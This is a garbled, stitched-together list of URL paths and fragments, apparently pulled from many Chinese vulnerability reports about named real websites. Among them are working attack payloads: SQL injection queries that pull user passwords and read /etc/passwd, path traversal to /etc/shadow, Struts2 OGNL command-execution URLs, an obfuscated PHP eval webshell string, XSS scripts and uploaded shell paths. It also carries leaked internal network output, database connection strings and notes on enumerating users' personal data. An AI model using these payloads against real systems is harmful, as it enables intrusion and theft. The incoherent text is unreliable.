/index.php?do=action&act=setgood&id=帖子ID&n=.jpg"/ /logo.gif?',266,266,{img:this www.hao123.com/logo.gif&url=&videoUrl= /business_aliveProduct.action?buyerId=28679‘ java:515 java:419 java:174 /manager/common/modifyPassword.action?type= /letv/data/www/enp/WEB-INF/classes/struts_manager.xml:216:64 java:350 /index.php?nocache=0.7832744262134323 / /editBookMark.php?hs=on&crumb=f80a4c&m=add&favCat=%25B3%25A3%25D3%25C3&favName=%25E4%25B9%258C%25E4%25BA%2591&favUrl=http%253A%252F%252Fwww.wooyun.org%252F / /step2.php这里亲 /pic/date_20130330/1364622479253.php c0deplay /soft/24224.htm brad Reveiw /Login.action /Dealer/default.shtml /Dealer/gys.shtml /status?full=true,http://njfy.gov.cn/web-console/ /app/course.bak?are /setup/phpinfo.php /setup/下给出了明文的数据库账号和密码 /space.php?mod=myalbums&uid=1821326284 
/1989894797/blog/1364446931 /FlexApp02C/FlexApp02C-debug/MainFrame.html /DCSS/DCSS-debug/MainFrame.html /phpMyAdmin/index.php?lang=zh-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=e4fdd4d0c0d8951e3fbd2ab3f7c59685 / /docs/funcspecs/2.jsp?sort=1&file=D%3A%5Capp%5CTomcat6%5Cwebapps%5Cjssw%5CWEB-INF%5Cclasses%5CSqlServerJdbc.properties mds.coi.gov.cn可知,其中http://mds.coi.gov.cn/UploadFile/ /网站 /ocean/index.jsp /NetApplyWeb/ / / / /admin888/left.aspx /sch/sch.jsp?vu=64708302265&k=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3C%22&t=2 xsst.sinaapp.com/Xss.swf xsst.sinaapp.com/Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000 /funshow/2013-03-31/s_13647082964440.jpg#.swf /funshow/2013-03-31/s_13647082964440.jpg#.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000 /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /music/musicbox_v2_1/img/MusicFlash.swf /1803680.wma|I /music/musicbox_v2_1/img/MusicFlash.swf /music/musicbox_v2_1/img/MusicFlash.swf /tbDetail.htm?currentPage=1&hotFlag=&stCity=%E5%8E%A6%E9%97%A8%E5%B8%82&endCity=%E6%B7%B1%E5%9C%B3%E5%B8%82&stCityId=70790&endCityId=46&pkTimetableId=1046556 /chepiao/querySch.htm?stCityInfo=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582%2C1&carryStaId=-1&busStopId=310000&busStopName=%25E4%25B8%258A%25E6%25B5%25B7&planDate=20130331&timeSta=00%3A00-24%3A00-d /newsDeal.do?method=downloadFile&path=../../../../../../../../../../../../etc/shadow /share/init?shareid=379117&uk=2969867219 /gift/exchange.aspx /fileDown?fname=/index.jsp 
hflx.whjjjc.org.cn/fileDown?fname=/application/login/loginCheck.jsp /searchTech.php?cd=0&p=2&sidtech=0&so=1%27%22&softId=&ssidtech=0 /searchGameTech.php?gameFrom=gameTech&searchType=tech&so=1%27%22 /wwwAAV.asp?gSKEY= /dpool/robots.txt/x.php /zhuangxiu/rijiku----/%22%3E%3Ciframe%20src=http://www.wooyun.org%20width=500%20height=500%3E%3C/iframe%3E/marquee%3E-.html /mindcity/%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22 /east/MC-lunar/hourly.php?year= /%3CIMG%20SRC=JaVaScRiPt:alert('XSS')%3E / /56mall/?do=Detail&id=NA== www.newman.mobi www.newman.mobi /default.php?m=default&c=shop&a=item&id=xx www.newman.mobi /ajax/Alivv.AjaxRun.WebSiteAjax,Alivv.AjaxRun.ashx?_method=BuyerWebSiteList&_session=r /CXTJ/login.aspx / /webadmin/down/downfile/ /library/ /item.htm?id=19606959454 /frames/login.aspx /schoolwork/selectServer.action /eva/flexui/index.do /jobs/jobs-show.php?id=8758%E2%80%98 plugins/weathermap /bluesword/blue_sword.php?t=t_upload&Action=PostMsg /search.asp?k=x /job_select.asp?id=11 /job_select.asp?id=11 /job_select.asp?id=11 musicbox.php?do= do=musicbox space.php?do=musicbox /index.php?c=follow&a=listen /index.php?id=12975 www.weisec.com讨论技术,转载请注明作者和出处 / /groupBuy/searchorder.do?method=EditOrderStateForCancle&searchOrderState=5&orderid=12878224 /cgi-bin/nw/focus.cgi?id=3 /cgi-bin/player/main.cgi?id=166 /cgi-bin/stat/match.cgi?oid=8322 /cgi-bin/nw/photo/main.cgi?cat=102 /mssd_test/diy/content.php?id=5243 /publish/index.php?NodeID=47&SiteID=1&page=2,存在注入漏洞参数:NodeID /kldpoi.php?do=topic&srchtxt=1&areaid=150000等多个页面均无过滤,导致存在sql注入,sqlmap可轻松拖库。。。 /login.action /login.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/usr/local/resin/doc/mail_u/WEB-INF/classes/struts.xml%22)) /realty/house!detail.action?id=4028e44e21ceb7a80121ceb854710061&comment=comment /Member/SetPasswordProtectionResult.do /Member/FindPasswordOK.jsp?mid=200 
/apps/actwrite/index.php?s=/Index/content/id/34256 /apps/actwrite/index.php?s=/Index/content/id/34256 /apps/actwrite/index.php?s=/Index/content/id/-34256 /bugs/wooyun-2010-021189 /index.php?m=ask&c=team&a=team_detail&belong=team&tid=39 /index.php?m=ask&c=team&a=quit_team&tid=42(tid改成任意你想解散团队的tid即可) /chromeplus/ /cgi-bin/singlesend?t=ajax-response&lang=zh_CN&type=1&content=1111111111&error=false&ajax=1&tofakeid=14****3660 /cgi-bin/contactmanagepage?t=wxm-friend&lang=zh_CN&pagesize=10&pageidx=0&type=0&groupid=0 /index.php?m=ask&c=index&a=init&belong=index /index.php?m=ask&c=index&a=delete&dosubmit=1&aid%5B%5D=217 /vedioinfo.php?id=405 /vedioinfo.php?id=405'即可暴路径 / /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /resin-admin/j_security_check?j_uri=status.php / /index!logon.action qiyi.com/520184.zmq qiyi.com/MAkai0313 qiyi.com/Hdhd@123 qiyi.com/zhiban /iwc_static/layout/login.html / /p/daily/content/index/zqshSDyvR/65 /YuShouZheng/SellView.ASP?SellID=2133 /YuShouZheng/SellView.ASP?x=%00&SellID=2133 www.wsgsav.com /admn/ly.asp /admn/wc.asp /bbs /bbs/view_topic.php?tid=11378 /cgi-bin/common/cgi_load_flash?uin=%s&fid=%s /bbs/ js代码 alert(document.cookie) /xxgl/hdpt_view.jsp?xh=43 /xxgl/blzn_view.jsp?xh=164 /reg/xgmm.jsp?zcid=27 /xxgl/zcfg_view.jsp?xh=39 /reg/jz_xx.jsp?zcid=5981 /reg/msg.jsp?zcid=5981&msg=4 /ywbl/1-2.jsp /ywbl/1-3.jsp /download/xz_download.jsp?filename=xz_download.jsp(文件名,按自己需求修改) /reg/jdc_xx.jsp?zcid=5981(ZCID参数可从27-12399进行遍历,下同,共有1万多人身份证、联系方式、驾驶证等信息,任意用户登录后可修改密码) /reg/jz_xx.jsp?zcid=5981 /reg/msg.jsp?zcid=5981&msg=4 /reg/xgmm.jsp?zcid=27(仅遍历) csjjcgs.cn“ /htgl/login.jsp schemas-microsoft-com:vml url(#default#vml);position:absolute;width:100%;height:100% /mail.vml#xss /login.php /newindex.php?url=ychjcontent&id=51%20and%201=2%20union%20select%201,2,concat%28unhex%28hex%28fd_user_acount%29%29,0x3a3a3a,unhex%28hex%28fd_user_pas%29%29%29,4,5,6,7,8,9,10,11,12,13%20from%20tb_user%20limit%201 /pic/zt/hysy/ / /login.jsp /index.php 
/Publicity/index.html /News/NewsDetail.aspx?newsid=4 /User/UserPurviewList.aspx?deptid=********&deptlevel=1&txtInnerUserID=18 /upfile/0710/admin.aspx /showNews!show.action?id=second17089 /henancms/jeecms/ArtiSearch.do?count=10&searchKey=asd / / / /\';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));// / /';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));// url(test.sct) /classic/base_download_att.php?file_name=test.sct&file_size=367.5&mid=02BB29DB41F5347D476D455DC6C699DEE600000000000002&content_type=application/octet-stream&attinfo=4-1533-2023-base64&fid=out /Public/view-news.htm?catid=1%27%22&id=30& /FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image /xsxx/photo.aspx?id=20120101111 //bbdaiyan_info.php?bb_id=34 www.yinzuo100.com /login.jsp  / gov.cn /lUOCMS_UTF8_V2.0.101201/upload/ http://www.a-muma.com/diyps.asp /a-m1.txt /admin/login.php install/ /cutecms_free_v3.5/index.php?staticUrl=[sql /login.action /login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(d))&('\u0023c')(('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(c))&(asdf) /login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h) /index.ph /cangku/login.php /cangku/php.php /w_inbookcase.php?book_id=233580%20and%201=2%20union%20select%201,version(),3%20-- /w_inbookcase.php?book_id=233580%20and%201=2%20union%20select%201,CONCAT(load_file(0x2F6574632F706173737764),load_file(0x2F7573722F6C6F63616C2F706870352F6C69622F7068702E696E69)),3%20-- /xhstamp/getStampsByName.html 
/.svn/entries /interfaceTest.php /sys/feedback.php /uc_server.tar.gz /index.jhtml /adduser.jsp /manager/login /phpshe_v1.1/index.php?mod=../../robots.txt%00 /phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001 /1/35/s5?vid=330 /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /espcms_utf8_5.6.13.03.14_b/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00 / /web/search.html?keyword=(此处构造恶意代码) search.daquan.xunlei.com/web/search.html?keyword= /?u=99e75d /7dUSI bdmobile.android.app/databases/webview.db /member/getverificationcode.html /oa/uploadfile/img/42f359171123244311-7ff9.gif /channel/doChannelList.action存在Structs2漏洞可以直接传木马。。。 /default.aspx / /CMOC/enterprise/CRM_Staff_List.aspx /InDigLib http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0 /OurHome/modules/core/Login.jsp?code=lvNo9vqC409wiDMfqSvy&successUrl=null www.baidu.com /UserControls/morenewlist.aspx?type=0 /login.aspx /bugs/wooyun-2013-021423 / /api/epg/now/?c=cctv8&cb=displayepg /shop_itemDetails.htm?item_id=1 /20110507/4375879_130153299169_2.jpg mail gw或者inurl:gate.等都可以搜索到。 mail edu.cn和inurl:mail gov.cn也可以找到目标。。。 /admin/还是可以很轻松判断是不是eYou。 /admin/ /admin/或http://www.target.com:8080/gw/admin/ admin@(eyou) eyou_admin /grad/admin/domain_logo.php这里,这个文件直接读取Cookie("cookie"),然后就带入popen了,没任何过滤,多好啊。 /grad/admin/domain_logo.php /grad/admin/test.txt /wctju3/list.aspx?lb=fw /2611294/ /task/2013-04/09/pub/5164188da1167.rar /getalbumprofile.do?owner=UserID /photo/UserID/latest/photo-PhotoID /admin/left.aspx 
/bibei/wap/soft?productid=34734&from=%E9%A6%96%E9%A1%B5&sid=55b3bc12d7&user_phone=nokia.5800&ad_mark=%E9%A6%96%E9%A1%B5%E8%BD%AF%E4%BB%B6&tpl=999999.9%27+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+FROM+%60information_schema%60.tables+WHERE+table_schema%3D0x657373656E7469616C5F736F6674%29%2C0x31303235343830303536%2C0x31303235343830303536--+a Channel.aspx/NewImpeachReport,在举报的附加说明处存在存储型XSS / /know/askquestion/?word= / /anti_theft/login.jsp /v3/safeup_lib.cab /XXXXX.cab /exhibitors-system/index.php?p=admin /exhibitors-system/index.php?company_id=149 /content/3217 /index.php?app=areafood&mod=Index&act=detail&id=640&i=34062&l=2425 /index.php?app=home&mod=Public&act=isEmailAvailable /en/%E4%BD%BF%E7%94%A8Authorization_Code%E8%8E%B7%E5%8F%96Access_Token /s/blog_56b798f801018jyb.html /newmoreJcdx.jsp?type=35注射点 /campus/preview?p_resumeId=7178&p_userId=7179 /campus/preview?p_resumeId=这里的编号&p_userId=这里的编号 /interface/cc.php?app_id=100&ids=100512522%3B100512280%3B100511966%3B100511203%3B100511519%3B100511441%3B100512490%3B100512606%3B100512503%3B100512393%3B100512322%3B100512493%3B100512309%3B100512292%3B100512277%3B100512424%3B100512351%3B100512219%3B100512130%3B100512604%3B100512561%3B100512386%3B100512362%3B100512610%3B100512545%3B100512459%3B100512405'&callback=jsonp1365649637356 /interface/cc.php?app_id=2&ids=55266%3B55264%3B55230%3B55250%3B55248%3B55247'&callback=jsonp1365649637357 /img/shouye_b5486898c692066bd2cbaeda86d74448.gif /app/enter?appid=280383 /search.php?key=%2522%253E%253Cscript%253Ealert%2811%29%253C%2Fscript%253E&format= /search.php?key=111&format= /12jup/vote/pl.asp?id=188 www.ctvonline.cn/news.php?act=downloadpdf&mid= www.ctvonline.cn/news.php?act=downloadpdf&mid=-1%20or%2076%20%3d%2074 / /admin/ /_console/ /_console/left.asp /_console/newflight/OrderPrintTicket.asp /_console/PwdUpdate.asp /background/index.asp 
/user/resetPwd/yyyy?pwdResetId=4&email=xxxxxxxxxxxxxx /front/article/article.action?id=3085 www.airchina.com.cn /esf_shop.php?uid=904 /tutor/login.action?_post_userType=1&userid=88952634&password=88952634&vcode=88952634 /VCHWeb/voucherForMem/queryNotuseVoucherNew.action?isweb=t&membercd=660010553848 /test.txt /user/userinfoLogin.action /apps/vshare/share.php?title=%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D_%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8%E9%80%9A%E4%BF%A1&url=http%3A%2F%2Fwww.10086.cn%2Fonlineservice%2Fcom_ask%2FSaS_H_F_Mobile%2F201209%2Ft20120908_38479.htm&app_key=809d94dc9e84f39e3646ee5c72f473f4 /apps/vshare/share.php?title=%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D_%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8%E9%80%9A%E4%BF%A1&url=http%3A%2F%2Fwww.10086.cn%2Fonlineservice%2Fcom_ask%2FSaS_H_F_Mobile%2F201209%2Ft20120908_38479.htm&&app_key=809d94dc9e84f39e3646ee5c72f473f4'%20and%201=1%20union%20select%20999998,999997,999996,999995%23 /,但是无法访问,可能限制网段,猜测它的原因是http://admin.talk.shequ.10086.cn/这类不存在的域名运营商是提示不存在的,而administrator无法访问。 /bless_json.php?timestamp_id=36g9vk6wk9&num=1000 /crm/Message/ExMailSend.asp?UID=&AccountID=&MailID=1&IsPrivate=1&OperateType=ReSend&TimeID=0.13946238309452646进入编写邮件界面,你可以上传、可以XSS,当然权限绕过不久就就发生在这里,很多页面都有权限绕过: /* /* /* / /priceCompete/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder= /priceCompete/ /rwpd/rwsun/rwSunPhoto!showPhotoReviewList.action?id=7045 /F199947.html /User/RemindMyPwd.asp /detail/7359838 /detail/4843254 /root/m15/?query=';%0aalert(1)// /protect/setQuestions 20.0 /fa/slide_3_41261_19668.html /cmnt/submit?channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg /UserLogin.aspx /webgps/ /?i=3422 /jsp/691error/queryTypes.jsp”(电信可以随时劫持任何通讯)。 
/jsp/691error/queryTypes.jsp /jsp/691error/queryTypes.jsp /freeAccountLogin?ip=113.***.***.192 /jsp/691error/queryTypes.jsp /service/error/queryTypes.action?loginName=02900******&latnId=290) function(data) /jsp/691error/qryowemoney.jsp /?i=3422 /wwht/extfiledown?wjlj=1346057307119.doc&path=file /wwht/userfiles/file/1346057307119.doc / /fckeditor/editor/filemanager/upload/php/upload.php?Type=Media /ucenter /dang/comment.php3?id=176 / /newfile/inc/relation.asp?news_id=834&about=99999999 /news_view.php?newsid=81 /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60 /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60 v2ex.com/setting /backup/backup.rar /1ndex.html /dev.php /common/lib/FCKeditor/editor/fckeditor.html /data/mysql_error_trace.inc /cgi-bin/php-cgi/html/svpnphp/_inc/commondef.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2F(以文本形式存在的php命令) /cgi-bin/php-cgi/html/211.txt / /xhsy/cont.aspx?id=3185 /hldr/admin/ /kn2013/admin/ /xhsy/admin/ /找些偏门的代码测试。 alert(1) /里,还是有不少可以使用的代码。譬如: /default.aspx?mainUrl=http%3a%2f%2fxssin**e%2fauth.php%3fid%3d2407 /reset_password.html?username=用户名&code=一串貌似是md5的加密字符 /data/logo/,访问发现可以遍历目录文件,上传的shell文件程序会自动把.jpg去掉改名成为logo.php,直接访问shell可对服务器进行操作,当前用户权限可以直接浏览服务器其他网站目录,造成服务器其他网站沦陷。 /dede//plus/search.php?keyword=as&typeArr[111%3D@`\ /organ/orgquerys.jsp?type=R /blog/article/190.html /index.php?plugins&q=user&page=0 /index.php?plugins&q=user&page=0 /V2Conf/jsp/user/loginAction.do /album/album/search.html /album/album/toEdit.html?album.id=77696&channelId=30©right=-1&page=1&type=-1 /tvpcms/show.html?customerParam=&page=1&sourceId=0&status=-1&tpa= /queryhqChart.html?price=8.68&carlibid=269276&localid=1&madeyear=2008 / /Uploads/1116751/photos/516ba0c351396.php /upload/common/2071894144/201304/201304142354597740.jpg /upload/common/2071894144/201304/201304142357212896.asp /news.php?id=290 /news_in.aspx?id=951 /mainPage/KcNew.aspx?course_id=111 /member.aspx?action=getpassword&uid=自己的uid&id=6位数字组合的随机码 
/web/article!list.action?id=3 / / /default_bak.asp /JMWebLucene /JMWebLucene/upload/disk/%E8%A5%BF%E5%AE%89%E7%85%A4%E4%B8%9A/%E4%B8%80%E5%8C%BA/JspSpy.jsp /sso/ /personal/updateEmailOfPage.jsps?updateEmail=123@126.com register.zhenai.com/register/upLoadUserPhotoPre.jsps%3FregType%3Dphone%26towhere%3Dhttp%253A%252F%252Fprofile.zhenai.com%252Fpersonal%252FmymainPage.jsps%3Fr%3D0.9503279209305837 / /yysjs.php?sid=42 /Fbii/sixFlyApplyAction_init.do /admin/baixiangshishi/ssnrform.jsp?mode=modify&ssnr_id=4034&lb=2107&page=1直接拥有管理权限,你懂得~ sale/d-*****.html(关键字可以换其他的,搜索引擎可以用谷歌) /common/lib/FCKeditor/editor/fckeditor.html txt /svn/ https://github.com/zcxey2911/newyouku/blob/master/%E8%AE%B0%E4%BA%8B.txt /CFIDE\componentutils\cfcexplorer.cfc /CFIDE\componentutils\cfcexplorer.cfc /bbs/topic/46 /bbs /addr/modaddr?id=90000720000 /?uid=355098 //easWebClient/ /nap/ //client/ /en/products/kis/ /login?service=http%3A%2F%2Fkdeas.kingdee.com%3A7888%2Feasportal%2F /down /easfiles/easdoc/files/ /sitemap.xml / /weibo/aa%253Ciframe%252Fonload%253Dalert(%252Fxss%252F)%253E&Refer=STopic_box /zj/zjkp_disp.jsp?yhid=1 /team/matchrank.php?page=2 /Video/Detail/13430 /Video/Detail/13431 /Video/Detail/13433 /serviceAction!toComm /admin/member/commmgt.jsp /wiki/wiki_detail.php?id=xxx,wiki_datail.php函数存在问题,通杀全国酷房站点; /wiki/wiki_detail.php?id=126 /wiki/wiki_detail.php?id=74 /wiki/wiki_detail.php?id=92 / /index.html /index.html /user_manage.php /user_manage.php /project_info.php?id=447 /project_info.php?id=447%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,database(),8,9,0,1,2,3,4,5,6/*xx 73d465767e39eb77:localhost 19012f603a01ad5e:% 71a4653336b50cfd:% /ct/ /Pages/PrintPage.aspx?ClassName=ReceiveidPrint&ObjID=1,2,3,4,5,6,7,8,9,10,11, /default/listen?nick=wooyun2 /default/listen?nick=wooyun2 /itemlist/default.htm /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /rest/2.0/services/cloud_dl /netdisk/BaiduYun_3.6.0.exe /netdisk/BaiduYun_3.6.0.exe /BaiduYun_3.6.0.exe 
/tbIndexAdvertisement!gotoIndex.action /sunflower/auth/login.action /zhuxian/zhuxianwishingtree/index.action /dpool/music/song_list.php?pos=82&sid=1 /p/publish.php /bxlz/admin/Detail.aspx?actorid=136 / /***** / / /home/stat /wow/cn/itemsets.html?su=496509 flvStart /all/index.php /weibo/Chu_%25E6%2598%25B5%25E7%25A7%25B0%25E9%2595%25BF%25E9%2595%25BF%25E9%2595%25BF&xsort=social&Refer=STopic_box /Search.Aspx?id=59&Key=1注入,sa权限 /2597/ www.xxxxx.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2 /www.rar /ladder/bridge/bridge_teamlist.asp?tid=1 /ladder/bridge/bridge_teamlist.asp?tid=1 /ladder/bridge_fee/gamelist_team.asp?tid=75 /userinfo/userinfo.aspx?username= /graphgamepassport!login.do?game=klsg&parent="/ /msg/bbs_msg.asp?reg=1&msgID=50002&Subject_ID=615&BBs_ID=""/ /templates/index/iframe_query.jsp?src=../../../../../../ flash小游戏 /game/FPBCHMON?fromwhere=dt%22%0aalert(1)// /list.asp?base_clsid=41 /news.aspx?ncid=1 /adminLog/detail?id=44 /user/repassword/userid/60xxx1366333027 /member/changepass/userid/注册用户ID1366281757 /files/121355/sapconfigservlet-exec.rb.txt /wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf /admin/AdminLoginForm.aspx?url=main.aspx id:13823787846 /search.php?pickout=1&cat_id=4&attr%5B5%5D=PU /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F../../../../../../ /zhaopin1.asp?area_id=wz /7sLky /?ali_trackid=2:mm_33706838_0_0:1366369169_3k8_1856758308 /?ali_trackid=2:mm_33706838_0_0:1366369169_3k8_1856758308 /sys/ctrls/WebEditor/editor.aspx?contentId=14&tabdef=&inapproot=0&folder=&dir= /icdpimage/XXXXX.aspx / /app/appOut.action /bugs/wooyun-2013-018437几乎相同,高校版并未修复。 /edu/web/product/product_info.php?columnId=149 /admin,发现跳到http://mi.cztv.com/admin/login/index /star?user_id=62、分别在参数值后'、-1、-0确定存在注入 php:318 
/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a weibo.com /?tf=5_009&gsid=[这里填搜到的gsid /newweb/secondpage.jsp?id=1146 /admin_index.asp /111.rar /silent.php /Admin_Sadofot.asp /image/oy.asp /editor/DownLoadegw.aspx /images/maing.asp /images/me.asp /login.asp /Zongg/addadm.asp /Admin/left.aspx /Admin/login.aspx /admin_index.asp /upload/upload.asp /upload/uploadFile/2013420183255.asp /webzine_0x05/走向本地的邪恶之路 //127.0.0.1/ /outdoor/ad/adAct.do?adRegionCode=321300&flag=1&method=viewLED&adSortId=2&sortType=LED /v3/gw?method=item.info.get&appKey=6fd4fe7743861fad&format=json&itemCodes=145934359 /test.php /phpinfo.php /manager/manager.asp /manager/dingyi_user.asp?action=ingonggao&pos=3%E2%80%98 /admin/Login.aspx?backUrl=http%3a%2f%2fedit.pcpop.com%2fpublish%2fart_add.aspx /pcpopkeyword/ /pcpopkeyword/20120515/ /pcpopkeyword/include/ashx/hd_lst.ashx?a=maylikeKeyword&ID=99 hezi.pcpop.com/.svn/entries /mysns/trunk/code/uc /token.ashx /login.ashx /login.ashx /cookie.ashx /admin/Default.html app.culture.ifeng.com /news/plus/search.php /index.action, www.ofweek.com主站如图: /sgs/2.0/updateios.asp?ID=20002&v=2.2.1 /include/ /include/config.inc /fb_detail.php?id=87 /admin/index.php /ask/search-answer/t/0?k=1 /admin/list.php /article.php?ID=948存在注入 / //plus/search.php?keyword=as&typeArr[111%3D@`\ /ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=341 /View.aspx?nid=8276 /poll.php?t_id=16437&succpage=http://publish.games.sina.com.cn/08/31/831/sign_1.html&failpage=http://publish.games.sina.com.cn/02/34/234/suc_1.html&&p_id=831 /export/spreadimg/id/315 /Index/ /webzine_0x05/走向本地的邪恶之路 //c:/ //c:/ //c:/ www.guidgenerator.com //c:/ /index.php?do=api&id={projectId}&location="+document.getElementById(1).contentWindow.document.getElementsByClassName('icon-folder')[0].getAttribute('title') 
/marry/marryadmin/web/store.php?method=getstoredetail&id=33 /log/download.php?type=filedown&file=Li4vY29uZmlnL2FkZF91c2VyX2RlbW8uY3N2&filename=add_user_demo.csv /log/download.php?type=filedown&file=../config/add_user_demo.csv&filename=add_user_demo.csv /log/download.php?type=filedown&file=Li4vbG9nL2Rvd25sb2FkLnBocA==&filename=download.php /register/CheckCode?invcode=工作专用 / /my/and.php /ue/vote/self/82/sta.action /irun/QandA/index.php?my=1 /PDA/ieIndex.jsp /zecmd/zecmd.jsp /ajax/vrzcode.php /irun/spot/runmap_detail.php?runid=221 xsser.me/4310VB //plus/search.php?keyword=as&typeArr[111%3D@`\ /data/mysqli_error_trace.inc //mynb/login.php?gotopage=%2F%2Fmynb%2Fcatalog_main.php /mshare /mshare /pages/pages.aspx?id=119&page=20 /content.php?ID=230存在注入 /vms/stage/vote/voteAction!moreComment.action /unify/jsp/myclient/prelist.action /eap /ucenter/user/regist!registUserInput.action Ethernet B8:95:9D 192.168.1.13 192.168.1.255 255.255.255.0 feb8:959d/64 Link MTU:1500 packets:1367574738 packets:811675317 txqueuelen:1000 bytes:202566496226 bytes:187154200360 Interrupt:169 f8000000-f8012100 Ethernet B8:95:9F 10.10.10.13 10.10.10.255 255.255.255.0 feb8:959f/64 Link MTU:1500 packets:554395930 packets:182724699 txqueuelen:1000 bytes:162249198852 bytes:20384776529 Interrupt:169 f4000000-f4012100 Local 127.0.0.1 255.0.0.0 Host MTU:16436 packets:3750930 packets:3750930 bytes:334641604 bytes:334641604 ucweb Local 192.168.1.217 255.255.255.255 MTU:16436 Local 192.168.1.218 255.255.255.255 MTU:16436 lo:8769 Local 192.168.1.219 255.255.255.255 MTU:16436 mysql://master.ucenter.db:3306/ucenter?useUnicode=true&characterEncoding=UTF-8 mysql://slave.ucenter.db:3306/ucenter?useUnicode=true&characterEncoding=UTF-8 mysql://localhost:3306/teacherclubauthority?useUnicode=true&characterEncoding=UTF-8 mysql://10.10.10.110:3306/dtsauthority?useUnicode=true&SelectMethod=Cursor&characterEncoding=UTF-8 mysql://db.dts.host:3306/dtsauthority?useUnicode=true&SelectMethod=Cursor&characterEncoding=UTF-8 
Ethernet F6:4A 192.168.1.81 192.168.1.255 255.255.255.0 f64a/64 Link MTU:1500 packets:59064843065 errors:35555 dropped:1348 frame:29361 packets:84287274407 txqueuelen:1000 bytes:17203587269987 bytes:79208430866539 fc400000-fc420000 Ethernet F6:4B 10.10.10.81 10.10.10.255 255.255.255.0 f64b/64 Link MTU:1500 packets:38447892281 packets:39092771155 txqueuelen:1000 bytes:28023906757374 bytes:8813716604203 fc500000-fc520000 Local 127.0.0.1 255.0.0.0 Host MTU:16436 packets:14353954794 packets:14353954794 bytes:83788103836248 bytes:83788103836248 Local 192.168.1.3 255.255.255.255 MTU:16436 /creditcard/view/vCardinfo.php?id=703 /urlth.php /?s=book_jishu&a=update&book_id=19999%¶m=read_num&t=051763dbb0652e system_r:unconfined_t:SystemLow-SystemHigh /guestbook/v3/index.asp?m_id=20110822 /usermanage/forgotten /usermanage/newpassword/email/{Base64Encode(xx@xx.com) /?p=189 /reg/trip1 /themes/zqzy/linux.php /shop/cart_item!list.action,该路径存在struts2漏洞,使用struts2终极漏洞利用工具,可以在其WEB服务器上传任意文件,远程执行任意命令,非常危险。 /admin/ xcar.com.cn php /xbackend1/login/ /home.action /plus/search.php?keyword=as&typeArr[111%3D@`\ /jynx /profile.html /backoffice/ /install/ install/install.php index.html history.go(-1) history.go(-1) QQ:848769359 /[/url history.go(-1) history.go(-1) /ipms/ /ajax/getVoteNums.php?ids=1 